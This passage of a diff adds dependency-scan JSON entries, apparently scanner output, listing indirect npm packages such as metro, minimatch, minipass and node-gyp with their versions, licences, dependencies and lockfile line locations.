"Locations": [ + { + "StartLine": 12592, + "EndLine": 12612 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "metro-symbolicate@0.83.3", + "Name": "metro-symbolicate", + "Identifier": { + "PURL": "pkg:npm/metro-symbolicate@0.83.3", + "UID": "537d705f96133974" + }, + "Version": "0.83.3", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "flow-enums-runtime@0.0.6", + "invariant@2.2.4", + "metro-source-map@0.83.3", + "nullthrows@1.1.1", + "source-map@0.5.7", + "vlq@1.0.1" + ], + "Locations": [ + { + "StartLine": 12622, + "EndLine": 12641 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "metro-transform-plugins@0.83.3", + "Name": "metro-transform-plugins", + "Identifier": { + "PURL": "pkg:npm/metro-transform-plugins@0.83.3", + "UID": "cadd877bd53991e" + }, + "Version": "0.83.3", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@babel/core@7.28.4", + "@babel/generator@7.28.3", + "@babel/template@7.27.2", + "@babel/traverse@7.28.4", + "flow-enums-runtime@0.0.6", + "nullthrows@1.1.1" + ], + "Locations": [ + { + "StartLine": 12651, + "EndLine": 12667 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "metro-transform-worker@0.83.3", + "Name": "metro-transform-worker", + "Identifier": { + "PURL": "pkg:npm/metro-transform-worker@0.83.3", + "UID": "d824036670560ea4" + }, + "Version": "0.83.3", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@babel/core@7.28.4", + "@babel/generator@7.28.3", + "@babel/parser@7.28.4", + "@babel/types@7.28.4", + "flow-enums-runtime@0.0.6", + "metro-babel-transformer@0.83.3", + "metro-cache-key@0.83.3", + "metro-cache@0.83.3", + "metro-minify-terser@0.83.3", + "metro-source-map@0.83.3", + "metro-transform-plugins@0.83.3", + "metro@0.83.3", + "nullthrows@1.1.1" + ], + "Locations": [ + { + "StartLine": 12668, + "EndLine": 12691 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "micromatch@4.0.8", + "Name": "micromatch", + "Identifier": { + "PURL": "pkg:npm/micromatch@4.0.8", + "UID": "6622bdc92d82389e" + }, + "Version": "4.0.8", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "braces@3.0.3", + "picomatch@2.3.1" + ], + "Locations": [ + { + "StartLine": 12743, + "EndLine": 12755 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "mime@1.6.0", + "Name": "mime", + "Identifier": { + "PURL": "pkg:npm/mime@1.6.0", + "UID": "21c80f3a47af737b" + }, + "Version": "1.6.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 19339, + "EndLine": 19350 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "mime@2.6.0", + "Name": "mime", + "Identifier": { + "PURL": "pkg:npm/mime@2.6.0", + "UID": "ce887b09a89757a6" + }, + "Version": "2.6.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 4295, + "EndLine": 4307 + }, + { + "StartLine": 17632, + "EndLine": 17643 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "mime-db@1.52.0", + "Name": "mime-db", + "Identifier": { + "PURL": "pkg:npm/mime-db@1.52.0", + "UID": "87aa76a86f450a37" + }, + "Version": "1.52.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 12771, + "EndLine": 12779 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "mime-types@2.1.35", + "Name": "mime-types", + "Identifier": { + "PURL": "pkg:npm/mime-types@2.1.35", + "UID": "16e8978b7540dd15" + }, + "Version": "2.1.35", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "mime-db@1.52.0" + ], + "Locations": [ + { + "StartLine": 12780, + "EndLine": 12791 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "mimic-fn@2.1.0", + "Name": "mimic-fn", + "Identifier": { + "PURL": "pkg:npm/mimic-fn@2.1.0", + "UID": "7e1b54d7c7dc30f1" + }, + "Version": "2.1.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 12792, + "EndLine": 12800 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "mimic-response@3.1.0", + "Name": "mimic-response", + "Identifier": { + "PURL": "pkg:npm/mimic-response@3.1.0", + "UID": "24e60a20b3bf47f3" + }, + "Version": "3.1.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 12801, + "EndLine": 12812 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "min-indent@1.0.1", + "Name": "min-indent", + "Identifier": { + "PURL": "pkg:npm/min-indent@1.0.1", + "UID": "d20c1ecabff975d5" + }, + "Version": "1.0.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 12813, + "EndLine": 12821 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "minimatch@10.0.3", + "Name": "minimatch", + "Identifier": { + "PURL": "pkg:npm/minimatch@10.0.3", + "UID": "97121a07d790c0d3" + }, + "Version": "10.0.3", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@isaacs/brace-expansion@5.0.0" + ], + "Locations": [ + { + "StartLine": 14795, + "EndLine": 14808 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "minimatch@3.1.2", + "Name": "minimatch", + "Identifier": { + "PURL": "pkg:npm/minimatch@3.1.2", + "UID": "69ef7485f56c11bb" + }, + "Version": "3.1.2", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "brace-expansion@1.1.12" + ], + "Locations": [ + { + "StartLine": 2284, + "EndLine": 2296 + }, + { + "StartLine": 3276, + "EndLine": 3288 + }, + { + "StartLine": 8768, + "EndLine": 8780 + }, + { + "StartLine": 8874, + "EndLine": 8886 + }, + { + "StartLine": 9778, + "EndLine": 9789 + }, + { + "StartLine": 20579, + "EndLine": 20590 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "minimatch@8.0.7", + "Name": "minimatch", + "Identifier": { + "PURL": "pkg:npm/minimatch@8.0.7", + "UID": "9d8dd66d3de32b0d" + }, + "Version": "8.0.7", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "brace-expansion@2.0.2" + ], + "Locations": [ + { + "StartLine": 6354, + "EndLine": 6368 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "minimatch@9.0.5", + "Name": "minimatch", + "Identifier": { + "PURL": "pkg:npm/minimatch@9.0.5", + "UID": "f9b14aafc2d2d91a" + }, + "Version": "9.0.5", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "brace-expansion@2.0.2" + ], + "Locations": [ + { + "StartLine": 12822, + "EndLine": 12836 + }, + { + "StartLine": 13976, + "EndLine": 13989 + }, + { + "StartLine": 15081, + "EndLine": 15096 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "minimist@1.2.8", + "Name": "minimist", + "Identifier": { + "PURL": "pkg:npm/minimist@1.2.8", + "UID": "a585ee83cef51d6c" + }, + "Version": "1.2.8", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 12837, + "EndLine": 12845 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "minimist-options@4.1.0", + "Name": "minimist-options", + "Identifier": { + "PURL": "pkg:npm/minimist-options@4.1.0", + "UID": "566ac4f2cc818832" + }, + "Version": "4.1.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "arrify@1.0.1", + "is-plain-obj@1.1.0", + "kind-of@6.0.3" + ], + "Locations": [ + { + "StartLine": 12846, + "EndLine": 12859 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "minipass@3.3.6", + "Name": "minipass", + "Identifier": { + "PURL": "pkg:npm/minipass@3.3.6", + "UID": "e355d7b9883afbe9" + }, + "Version": "3.3.6", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "yallist@4.0.0" + ], + "Locations": [ + { + "StartLine": 6865, + "EndLine": 6877 + }, + { + "StartLine": 9515, + "EndLine": 9527 + }, + { + "StartLine": 12201, + "EndLine": 12213 + }, + { + "StartLine": 12891, + "EndLine": 12903 + }, + { + "StartLine": 12929, + "EndLine": 12941 + }, + { + "StartLine": 12962, + "EndLine": 12974 + }, + { + "StartLine": 12995, + "EndLine": 13007 + }, + { + "StartLine": 13028, + "EndLine": 13040 + }, + { + "StartLine": 13062, + "EndLine": 13074 + }, + { + "StartLine": 14861, + "EndLine": 14871 + }, + { + "StartLine": 14885, + "EndLine": 14895 + }, + { + "StartLine": 14909, + "EndLine": 14919 + }, + { + "StartLine": 19947, + "EndLine": 19959 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "minipass@4.2.8", + "Name": "minipass", + "Identifier": { + "PURL": "pkg:npm/minipass@4.2.8", + "UID": "3cc8bcc2b9772ab4" + }, + "Version": "4.2.8", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 6369, + "EndLine": 6377 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "minipass@5.0.0", + "Name": "minipass", + "Identifier": { + "PURL": "pkg:npm/minipass@5.0.0", + "UID": "fe5d2ee9f26f90a0" + }, + "Version": "5.0.0", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 20504, + "EndLine": 20513 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "minipass@7.1.2", + "Name": "minipass", + "Identifier": { + "PURL": "pkg:npm/minipass@7.1.2", + "UID": "f5102f4a76b9db01" + }, + "Version": "7.1.2", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 12869, + "EndLine": 12877 + }, + { + "StartLine": 14809, + "EndLine": 14818 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "minipass-collect@1.0.2", + "Name": "minipass-collect", + "Identifier": { + "PURL": "pkg:npm/minipass-collect@1.0.2", + "UID": "e3c359f0ffd3a652" + }, + "Version": "1.0.2", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "minipass@3.3.6" + ], + "Locations": [ + { + "StartLine": 12878, + "EndLine": 12890 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "minipass-collect@2.0.1", + "Name": "minipass-collect", + "Identifier": { + "PURL": "pkg:npm/minipass-collect@2.0.1", + "UID": "f9167ee3c7178c4c" + }, + "Version": "2.0.1", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "minipass@7.1.2" + ], + "Locations": [ + { + "StartLine": 14819, + "EndLine": 14831 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "minipass-fetch@1.4.1", + "Name": "minipass-fetch", + "Identifier": { + "PURL": "pkg:npm/minipass-fetch@1.4.1", + "UID": "2f36da76cb43bdc2" + }, + "Version": "1.4.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "encoding@0.1.13", + "minipass-sized@1.0.3", + "minipass@3.3.6", + "minizlib@2.1.2" + ], + "Locations": [ + { + "StartLine": 12911, + "EndLine": 12928 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "minipass-fetch@4.0.1", + "Name": "minipass-fetch", + "Identifier": { + "PURL": "pkg:npm/minipass-fetch@4.0.1", + "UID": "5dad645d74ce242d" + }, + "Version": "4.0.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "encoding@0.1.13", + "minipass-sized@1.0.3", + "minipass@7.1.2", + "minizlib@3.1.0" + ], + "Locations": [ + { + "StartLine": 14832, + "EndLine": 14847 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "minipass-flush@1.0.5", + "Name": "minipass-flush", + "Identifier": { + "PURL": "pkg:npm/minipass-flush@1.0.5", + "UID": "856ad1efd93041b7" + }, + "Version": "1.0.5", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "minipass@3.3.6" + ], + "Locations": [ + { + "StartLine": 12949, + "EndLine": 12961 + }, + { + "StartLine": 14848, + "EndLine": 14860 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "minipass-pipeline@1.2.4", + "Name": "minipass-pipeline", + "Identifier": { + "PURL": "pkg:npm/minipass-pipeline@1.2.4", + "UID": "b42640ad8990f54e" + }, + "Version": "1.2.4", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "minipass@3.3.6" + ], + "Locations": [ + { + "StartLine": 12982, + "EndLine": 12994 + }, + { + "StartLine": 14872, + "EndLine": 14884 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "minipass-sized@1.0.3", + "Name": "minipass-sized", + "Identifier": { + "PURL": "pkg:npm/minipass-sized@1.0.3", + "UID": "828e761e38c4617e" + }, + "Version": "1.0.3", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "minipass@3.3.6" + ], + "Locations": [ + { + "StartLine": 13015, + "EndLine": 13027 + }, + { + "StartLine": 14896, + "EndLine": 14908 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "minizlib@2.1.2", + "Name": "minizlib", + "Identifier": { + "PURL": "pkg:npm/minizlib@2.1.2", + "UID": "c8daee8e5f746f3a" + }, + "Version": "2.1.2", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "minipass@3.3.6", + "yallist@4.0.0" + ], + "Locations": [ + { + "StartLine": 13048, + "EndLine": 13061 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "minizlib@3.1.0", + "Name": "minizlib", + "Identifier": { + "PURL": "pkg:npm/minizlib@3.1.0", + "UID": "ee4ead8dcae1b54f" + }, + "Version": "3.1.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "minipass@7.1.2" + ], + "Locations": [ + { + "StartLine": 14920, + "EndLine": 14932 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "mkdirp@1.0.4", + "Name": "mkdirp", + "Identifier": { + "PURL": "pkg:npm/mkdirp@1.0.4", + "UID": "fa6dba5b63fadd12" + }, + "Version": "1.0.4", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 13082, + "EndLine": 13093 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "mkdirp-classic@0.5.3", + "Name": "mkdirp-classic", + "Identifier": { + "PURL": "pkg:npm/mkdirp-classic@0.5.3", + "UID": "64ba96e9a95564" + }, + "Version": "0.5.3", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 13094, + "EndLine": 13099 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "ms@2.0.0", + "Name": "ms", + "Identifier": { + "PURL": "pkg:npm/ms@2.0.0", + "UID": "90d54608e3fa22a5" + }, + "Version": "2.0.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 6675, + "EndLine": 6681 + }, + { + "StartLine": 7353, + "EndLine": 7359 + }, + { + "StartLine": 7390, + "EndLine": 7395 + }, + { + "StartLine": 9276, + "EndLine": 9281 + }, + { + "StartLine": 11825, + "EndLine": 11830 + }, + { + "StartLine": 19333, + "EndLine": 19338 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "ms@2.1.3", + "Name": "ms", + "Identifier": { + "PURL": "pkg:npm/ms@2.1.3", + "UID": "ac6875497060eb93" + }, + "Version": "2.1.3", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 13109, + "EndLine": 13114 + }, + { + "StartLine": 14933, + "EndLine": 14939 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "mute-stream@2.0.0", + "Name": "mute-stream", + "Identifier": { + "PURL": "pkg:npm/mute-stream@2.0.0", + "UID": "5f5f530995b8962f" + }, + "Version": "2.0.0", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 14940, + "EndLine": 14947 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "nanoid@3.3.11", + "Name": "nanoid", + "Identifier": { + "PURL": "pkg:npm/nanoid@3.3.11", + "UID": "4b2510c113abb607" + }, + "Version": "3.3.11", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 13115, + "EndLine": 13132 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "napi-build-utils@2.0.0", + "Name": "napi-build-utils", + "Identifier": { + "PURL": "pkg:npm/napi-build-utils@2.0.0", + "UID": "db462abbe6ab4109" + }, + "Version": "2.0.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 13133, + "EndLine": 13138 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "negotiator@0.6.3", + "Name": "negotiator", + "Identifier": { + "PURL": "pkg:npm/negotiator@0.6.3", + "UID": "e84defc9f744381f" + }, + "Version": "0.6.3", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 5780, + "EndLine": 5788 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "negotiator@0.6.4", + "Name": "negotiator", + "Identifier": { + "PURL": "pkg:npm/negotiator@0.6.4", + "UID": "5dcfc5f12a08a060" + }, + "Version": "0.6.4", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 13146, + "EndLine": 13155 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "negotiator@1.0.0", + "Name": "negotiator", + "Identifier": { + "PURL": "pkg:npm/negotiator@1.0.0", + "UID": "d5a88c1ebf2640d1" + }, + "Version": "1.0.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 14948, + "EndLine": 14957 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "no-case@3.0.4", + "Name": "no-case", + "Identifier": { + "PURL": "pkg:npm/no-case@3.0.4", + "UID": "b4a4694ddce8d202" + }, + "Version": "3.0.4", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "lower-case@2.0.2", + "tslib@2.8.1" + ], + "Locations": [ + { + "StartLine": 13156, + "EndLine": 13165 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "nocache@3.0.4", + "Name": "nocache", + "Identifier": { + "PURL": "pkg:npm/nocache@3.0.4", + "UID": "8eee10b454685bb7" + }, + "Version": "3.0.4", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 13172, + "EndLine": 13181 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "node-abi@3.78.0", + "Name": "node-abi", + "Identifier": { + "PURL": "pkg:npm/node-abi@3.78.0", + "UID": "4fcd3072ea85ee69" + }, + "Version": "3.78.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "semver@7.7.3" + ], + "Locations": [ + { + "StartLine": 13182, + "EndLine": 13193 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "node-addon-api@6.1.0", + "Name": "node-addon-api", + "Identifier": { + "PURL": "pkg:npm/node-addon-api@6.1.0", + "UID": "b310ea42f7e25b7a" + }, + "Version": "6.1.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 13206, + "EndLine": 13211 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "node-addon-api@7.1.1", + "Name": "node-addon-api", + "Identifier": { + "PURL": "pkg:npm/node-addon-api@7.1.1", + "UID": "711bdfb587e52ab1" + }, + "Version": "7.1.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 19927, + "EndLine": 19933 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "node-fetch@1.7.3", + "Name": "node-fetch", + "Identifier": { + "PURL": "pkg:npm/node-fetch@1.7.3", + "UID": "e78eaaf2132ae187" + }, + "Version": "1.7.3", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "encoding@0.1.13", + "is-stream@1.1.0" + ], + "Locations": [ + { + "StartLine": 13212, + "EndLine": 13221 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "node-gyp@11.4.2", + "Name": "node-gyp", + "Identifier": { + "PURL": "pkg:npm/node-gyp@11.4.2", + "UID": "20b5782af8b44e1b" + }, + "Version": "11.4.2", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "env-paths@2.2.1", + "exponential-backoff@3.1.2", + "graceful-fs@4.2.11", + "make-fetch-happen@14.0.3", + "nopt@8.1.0", + "proc-log@5.0.0", + "semver@7.7.3", + "tar@7.5.1", + "tinyglobby@0.2.15", + "which@5.0.0" + ], + "Locations": [ + { + "StartLine": 14958, + "EndLine": 14980 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "node-gyp@8.4.1", + "Name": "node-gyp", + "Identifier": { + "PURL": "pkg:npm/node-gyp@8.4.1", + "UID": "bd908fc6c4a06452" + }, + "Version": "8.4.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "env-paths@2.2.1", + "glob@7.2.3", + "graceful-fs@4.2.11", + "make-fetch-happen@9.1.0", + "nopt@5.0.0", + "npmlog@6.0.2", + "rimraf@3.0.2", + "semver@7.7.3", + "tar@6.2.1", + "which@2.0.2" + ], + "Locations": [ + { + "StartLine": 13231, + "EndLine": 13255 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "node-html-parser@7.0.1", + "Name": "node-html-parser", + "Identifier": { + "PURL": "pkg:npm/node-html-parser@7.0.1", + "UID": "bfd1466b672cc535" + }, + "Version": "7.0.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "css-select@5.2.2", + "he@1.2.0" + ], + "Locations": [ + { + "StartLine": 13269, + "EndLine": 13278 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "node-int64@0.4.0", + "Name": "node-int64", + "Identifier": { + "PURL": "pkg:npm/node-int64@0.4.0", + "UID": "fea43e86bc06228f" + }, + "Version": "0.4.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 13279, + "EndLine": 13284 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "node-releases@2.0.23", + "Name": "node-releases", + "Identifier": { + "PURL": "pkg:npm/node-releases@2.0.23", + "UID": "f9b959f2943c8284" + }, + "Version": "2.0.23", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 13285, + "EndLine": 13290 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "node-stream-zip@1.15.0", + "Name": "node-stream-zip", + "Identifier": { + "PURL": "pkg:npm/node-stream-zip@1.15.0", + "UID": "76dc55a507845b7d" + }, + "Version": "1.15.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 13291, + "EndLine": 13304 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "noop-fn@1.0.0", + "Name": "noop-fn", + "Identifier": { + "PURL": "pkg:npm/noop-fn@1.0.0", + "UID": "99f4bd480b5d08a5" + }, + "Version": "1.0.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 13305, + "EndLine": 13310 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "nopt@5.0.0", + "Name": "nopt", + "Identifier": { + "PURL": "pkg:npm/nopt@5.0.0", + "UID": "43548e31e6725e42" + }, + "Version": "5.0.0", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "abbrev@1.1.1" + ], + "Locations": [ + { + "StartLine": 13311, + "EndLine": 13326 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "nopt@8.1.0", + "Name": "nopt", + "Identifier": { + "PURL": "pkg:npm/nopt@8.1.0", + "UID": "b0f50499e32eca0b" + }, + "Version": "8.1.0", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "abbrev@3.0.1" + ], + "Locations": [ + { + "StartLine": 15114, + "EndLine": 15127 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "normalize-package-data@2.5.0", + "Name": "normalize-package-data", + "Identifier": { + "PURL": "pkg:npm/normalize-package-data@2.5.0", + "UID": "bc372266b2342be6" + }, + "Version": "2.5.0", + "Licenses": [ + "BSD-2-Clause" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "hosted-git-info@2.8.9", + "resolve@1.22.10", + "semver@5.7.2", + "validate-npm-package-license@3.0.4" + ], + "Locations": [ + { + "StartLine": 18868, + "EndLine": 18879 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "normalize-package-data@3.0.3", + "Name": "normalize-package-data", + "Identifier": { + "PURL": "pkg:npm/normalize-package-data@3.0.3", + "UID": "5c02bc3329583696" + }, + "Version": "3.0.3", + "Licenses": [ + "BSD-2-Clause" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "hosted-git-info@4.1.0", + "is-core-module@2.16.1", + "semver@7.7.3", + "validate-npm-package-license@3.0.4" + ], + "Locations": [ + { + "StartLine": 13327, + "EndLine": 13341 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "normalize-path@3.0.0", + "Name": "normalize-path", + "Identifier": { + "PURL": "pkg:npm/normalize-path@3.0.0", + "UID": "23eece3d352cd2c5" + }, + "Version": "3.0.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 13354, + "EndLine": 13362 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "npm-audit-report@6.0.0", + "Name": "npm-audit-report", + "Identifier": { + "PURL": "pkg:npm/npm-audit-report@6.0.0", + "UID": "432331d1906dd732" + }, + "Version": "6.0.0", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 15128, + "EndLine": 15135 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "npm-bundled@4.0.0", + "Name": "npm-bundled", + "Identifier": { + "PURL": "pkg:npm/npm-bundled@4.0.0", + "UID": "e1d49ae79e497c5c" + }, + "Version": "4.0.0", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "npm-normalize-package-bin@4.0.0" + ], + "Locations": [ + { + "StartLine": 15136, + "EndLine": 15146 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "npm-install-checks@7.1.2", + "Name": "npm-install-checks", + "Identifier": { + "PURL": "pkg:npm/npm-install-checks@7.1.2", + "UID": "d8884e8a62b892e5" + }, + "Version": "7.1.2", + "Licenses": [ + "BSD-2-Clause" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "semver@7.7.3" + ], + "Locations": [ + { + "StartLine": 15147, + "EndLine": 15157 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "npm-normalize-package-bin@4.0.0", + "Name": "npm-normalize-package-bin", + "Identifier": { + "PURL": "pkg:npm/npm-normalize-package-bin@4.0.0", + "UID": "9258634d53be0439" + }, + "Version": "4.0.0", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 15158, + "EndLine": 15165 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "npm-package-arg@13.0.1", + "Name": "npm-package-arg", + "Identifier": { + "PURL": "pkg:npm/npm-package-arg@13.0.1", + "UID": "6ca13cd3d216e24d" + }, + "Version": "13.0.1", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "hosted-git-info@9.0.2", + "proc-log@5.0.0", + "semver@7.7.3", + "validate-npm-package-name@6.0.2" + ], + "Locations": [ + { + "StartLine": 15166, + "EndLine": 15179 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "npm-packlist@10.0.2", + "Name": "npm-packlist", + "Identifier": { + "PURL": "pkg:npm/npm-packlist@10.0.2", + "UID": "526b387e5bfd35b" + }, + "Version": "10.0.2", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "ignore-walk@8.0.0", + "proc-log@5.0.0" + ], + "Locations": [ + { + "StartLine": 15180, + "EndLine": 15191 + } + ], + "AnalyzedBy": "npm" + }, + { + 